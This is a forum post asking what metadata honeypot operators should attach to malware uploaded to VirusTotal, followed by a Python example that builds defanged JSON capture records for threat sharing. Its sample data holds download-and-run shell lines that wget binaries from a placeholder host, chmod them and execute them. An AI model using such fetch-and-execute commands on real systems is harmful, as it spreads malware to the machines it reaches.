Malware metadata for researchers, what should be added to captured malware?

Henry
May 10, 2016, 3:40:43 AM
to VirusTotal
When uploading captured malware to virustotal, what additional metadata is useful to researchers?

I've been trying to collect some additional information about the capture which I add as comments, but I would like some input from malware researchers or AV vendors about what metadata to provide.
The data I collect and report on is:
- Malware file host
- Attacking IPs using this file host
- The command line commands used to download the loader script
- The script downloading the platform variants
- The malware in various platform variants (also giving a list of platform variants found at the same file host)
I assume many of the collected IPs won't be valid for a long period of time; the same goes for attacking IPs (which might include decoys), but perhaps some patterns can be found.
Examples:
https://www.virustotal.com/en/file/c0355a82051e3d7a3c744d9409b6cc33e4d31cb547cea72eed95400cfe1b74a1/analysis/
https://www.virustotal.com/en/file/c163b79decaec6a4b8e396d468091757b6348ec8a9e058cb6578474dc282f8c8/analysis/

Are the reports (in the comments) useful? How can they be improved? When providing metadata, would it be useful to provide the data in a machine-readable format like JSON?
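The following is an added example of what a machine-readable version of the metadata listed in the post could look like; it is not code from the post, and VirusTotal defines no comment schema of its own. The field names (`schema_version`, `file_host`, `attacking_ips`, `download_commands`, `loader_script`, `variants`) are an assumed layout chosen here, the sample files and IPs are constructed placeholders (RFC 5737 documentation addresses, not a real drop host), and the only real-world anchor is the SHA-256, which is the key VirusTotal reports are indexed by. Two practitioner details the post's bullet list does not cover are included: indicators are defanged before posting so the comment cannot be auto-fetched or clicked, and attacker IPs are validated, deduplicated and flagged when they fall in private or reserved ranges (a honeypot's own address or a decoy shows up as such).

```python
"""Build a JSON record describing one malware capture (added example; assumed schema)."""
import hashlib
import ipaddress
import json
import re
from datetime import datetime, timezone

# Constructed stand-ins for the files pulled from a drop host. They are plain
# text, not malware; they exist only so the hashes can be computed offline.
SAMPLE_HOST = "http://203.0.113.10/"
SAMPLE_LOADER = (
    b"#!/bin/sh\ncd /tmp; for a in x86 arm mips; do "
    b"wget -q http://203.0.113.10/bin.$a; chmod +x bin.$a; ./bin.$a; done\n"
)
SAMPLE_VARIANTS = {
    "x86": b"constructed x86 placeholder",
    "arm": b"constructed arm placeholder",
    "mips": b"constructed mips placeholder",
}
SAMPLE_COMMANDS = ["cd /tmp; wget http://203.0.113.10/x.sh; sh x.sh"]
SAMPLE_ATTACKERS = ["203.0.113.77", "203.0.113.77", "10.0.0.1", "not-an-ip"]

_IPV4 = re.compile(r"\b(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\b")


def sha256_hex(data: bytes) -> str:
    """SHA-256 is the identifier VirusTotal keys reports on, so every artefact gets one."""
    return hashlib.sha256(data).hexdigest()


def defang(text: str) -> str:
    """Break URLs and IPv4 addresses so a pasted record is neither clickable nor auto-fetched."""
    text = re.sub(r"(?i)\bhttp(s?)://", r"hxxp\1://", text)
    return _IPV4.sub(r"\1.\2.\3[.]\4", text)


def classify_ips(candidates):
    """Validate and deduplicate attacker IPs; return (accepted, rejected).

    Each accepted entry carries ipaddress's is_private flag, so a sensor's own
    RFC 1918 address, loopback, or a documentation-range placeholder is visible
    as non-routable instead of being reported as an attacker.
    """
    accepted, rejected, seen = [], [], set()
    for raw in candidates:
        try:
            ip = ipaddress.ip_address(raw.strip())
        except ValueError:
            rejected.append(raw)
            continue
        if str(ip) in seen:
            continue
        seen.add(str(ip))
        accepted.append({"ip": str(ip), "version": ip.version, "is_private": ip.is_private})
    return accepted, rejected


def build_capture_record(file_host, attacking_ips, download_commands,
                         loader_script, variants, observed_at=None):
    """Assemble one capture into a dict; field names are this example's assumption."""
    when = observed_at or datetime.now(timezone.utc)
    accepted, rejected = classify_ips(attacking_ips)
    return {
        "schema_version": 1,
        "observed_at": when.isoformat(timespec="seconds"),
        "file_host": file_host,
        "attacking_ips": accepted,
        "rejected_ip_strings": rejected,       # kept so a bad parse is not silently lost
        "download_commands": list(download_commands),
        "loader_script": {
            "sha256": sha256_hex(loader_script),
            "size": len(loader_script),
            "content": loader_script.decode("utf-8", "replace"),
        },
        # Sorted so two captures of the same host produce byte-identical records.
        "variants": sorted(
            ({"platform": p, "sha256": sha256_hex(b), "size": len(b)} for p, b in variants.items()),
            key=lambda v: v["platform"],
        ),
    }


def to_json(record, defanged=True):
    """Serialize for posting; defanging is applied to the finished text so no field is missed."""
    text = json.dumps(record, indent=2, sort_keys=True)
    return defang(text) if defanged else text


def from_json(text):
    """Parse a posted record back, reversing the defanging so indicators are usable."""
    return json.loads(text.replace("hxxp", "http").replace("[.]", "."))


def example_record():
    """Deterministic record built from the constructed sample data above."""
    return build_capture_record(
        SAMPLE_HOST, SAMPLE_ATTACKERS, SAMPLE_COMMANDS, SAMPLE_LOADER, SAMPLE_VARIANTS,
        observed_at=datetime(2016, 5, 10, 3, 40, 43, tzinfo=timezone.utc),
    )


if __name__ == "__main__":
    print(to_json(example_record()))
```

The record deliberately keeps the raw download command line and loader script verbatim (they are what lets a researcher recognise a campaign after the host and IPs have rotated), while the per-platform SHA-256 list is what allows each variant's VirusTotal report to be linked from the others.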
